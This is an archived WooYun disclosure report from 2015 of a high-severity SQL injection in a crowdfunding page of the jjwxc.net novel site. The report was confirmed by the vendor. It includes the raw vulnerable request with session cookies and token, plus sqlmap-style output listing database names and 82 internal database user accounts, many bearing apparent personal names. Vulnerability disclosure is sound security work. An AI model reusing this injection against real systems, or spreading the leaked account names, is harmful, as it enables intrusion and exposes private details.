乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-12: 细节已通知厂商并且等待厂商处理中 2015-08-12: 厂商已经确认,细节仅向厂商公开 2015-08-22: 细节向核心白帽子及相关领域专家公开 2015-09-01: 细节向普通白帽子公开 2015-09-11: 细节向实习白帽子公开 2015-09-26: 细节向公众公开
rt
注入点
GET /crowdfunding/supportOrder.php?id=33&priceid=149 HTTP/1.1Host: my.jjwxc.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: CNZZDATA30075907=cnzz_eid%3D434848196-1439182460-http%253A%252F%252Fwww.jjwxc.net%252F%26ntime%3D1439284534; __gads=ID=dd635bafc2021415:T=1439186463:S=ALNI_Mb9d4kJqQtFRy9J44HKB7nNC-KKZg; timeOffset_o=4418.89990234375; ispayuser=18289630-1; CNZZDATA1255436189=738594318-1439185101-http%253A%252F%252Fmy.jjwxc.net%252F%7C1439285538; Hm_lvt_9abb8a0f7324f452d17274e5caa6a727=1439201884; ad_play_index=19; Hm_lvt_2621cceb855168162d28a33806e75820=1439273501; Hm_lpvt_2621cceb855168162d28a33806e75820=1439273501; testcookie=yes; clicktype=; bbstoken=e836c081396913d7456d7173f607b4ca; nicknameAndsign=2%257E%2529%2524woo126; token=MTgyODk2MzB8NmFjYzJkODc3Njg2M2ZiMmRhMTlhM2ExYmI3MjkwN2F8fHRlc3RfY3VtdEAxMjYuY29tfHx8MXx8fOasoui%2FjuaCqO%2B8jOaZi%2Baxn%2BeUqOaIt3wwfGVtYWls; sms_total=3Connection: keep-alive
[18:14:09] [INFO] fetching database names[18:14:09] [INFO] the SQL query used returns 7 entries[18:14:10] [INFO] retrieved: "information_schema"[18:14:10] [INFO] retrieved: "ip"[18:14:10] [INFO] retrieved: "mysql"[18:14:10] [INFO] retrieved: "performance_schema"[18:14:10] [INFO] retrieved: "phpmyadmin"[18:14:11] [INFO] retrieved: "selfnovel"[18:14:11] [INFO] retrieved: "test"available databases [7]:[*] information_schema[*] ip[*] mysql[*] performance_schema[*] phpmyadmin[*] selfnovel[*] test
database management system users [82]:[*] '3g'@'10.9.%'[*] '_diaosi'@'10.9.%'[*] '_duchengbin'@'10.9.%'[*] '_huangyanming'@'10.9.%'[*] '_humengling'@'10.9.%'[*] '_limeng'@'10.9.%'[*] '_liuhuan'@'10.9.%'[*] '_liupeng'@'10.9.%'[*] '_liuxudong'@'10.9.%'[*] '_liuxuemeng'@'10.9.%'[*] '_qiandeyang'@'10.9.%'[*] '_shiminmin'@'10.9.%'[*] '_sushang'@'10.9.%'[*] '_wangqing'@'10.9.%'[*] '_xiaomingliang'@'10.9.%'[*] '_xiewenbin'@'10.9.%'[*] '_yanglili'@'10.9.%'[*] '_yelongyi'@'10.9.%'[*] '_zhangchen'@'10.9.%'[*] '_zhangfeng'@'10.9.%'[*] '_zhaoyu'@'10.9.%'[*] 'api_master'@'10.9.%'[*] 'api_slave'@'10.9.%'[*] 'backend'@'10.9.%'[*] 'backup'@'10.9.%'[*] 'bbs_master'@'10.9.%'[*] 'bbs_slave'@'10.9.%'[*] 'bobtestuser'@'10.9.%'[*] 'bookshop_master'@'10.9.%'[*] 'bookshop_slave'@'10.9.%'[*] 'cloud_master'@'10.9.%'[*] 'cloud_slave'@'10.9.%'[*] 'cron'@'10.9.%'[*] 'duchengbin'@'10.9.%'[*] 'files_master'@'10.9.%'[*] 'files_slave'@'10.9.%'[*] 'game_master'@'10.9.%'[*] 'game_slave'@'10.9.%'[*] 'gaoshuai'@'10.9.%'[*] 'harem_master'@'10.9.%'[*] 'harem_slave'@'10.9.%'[*] 'help_master'@'10.9.%'[*] 'help_slave'@'10.9.%'[*] 'huangyanming'@'10.9.%'[*] 'iceheart'@'10.9.%'[*] 'index_creator'@'10.9.%'[*] 'jishu_duchengbin'@'10.9.%'[*] 'jishu_liupeng'@'10.9.%'[*] 'jishu_qiandeyang'@'10.9.%'[*] 'jishu_sushang'@'10.9.%'[*] 'jishu_xiewenbin'@'10.9.%'[*] 'jishu_zhangchen'@'10.9.%'[*] 'jishu_zhaoyu'@'10.9.%'[*] 'liupeng'@'10.9.%'[*] 'liuxudong'@'10.9.%'[*] 'monitor'@'10.9.%'[*] 'monty'@'10.9.%'[*] 'mtop'@'localhost'[*] 'mysql-zrm-backup'@'%'[*] 'open_master'@'10.9.%'[*] 'open_slave'@'10.9.%'[*] 'qiandeyang'@'10.9.%'[*] 'readonlyuser'@'10.9.%'[*] 'root'@'localhost'[*] 'sales_master'@'10.9.%'[*] 'sales_slave'@'10.9.%'[*] 'service'@'10.9.%'[*] 'superdong'@'10.9.%'[*] 'sushang'@'10.9.%'[*] 'sync'@'10.9.%'[*] 'testuser'@'10.9.%'[*] 'wangxian'@'10.9.%'[*] 'wap'@'10.9.%'[*] 'wap_master'@'10.9.%'[*] 'wap_slave'@'10.9.%'[*] 'wmm'@'10.9.%'[*] 'www_master'@'10.9.%'[*] 'www_slave'@'10.9.%'[*] 'xiewenbin'@'10.9.%'[*] 'zhangfeng'@'10.9.%'[*] 'zhangjun'@'10.9.%'[*] 'zhaoyu'@'10.9.%'
同上
过滤
危害等级:高
漏洞Rank:15
确认时间:2015-08-12 17:40
已经安排技术人员处理,非常感谢您的支持!
暂无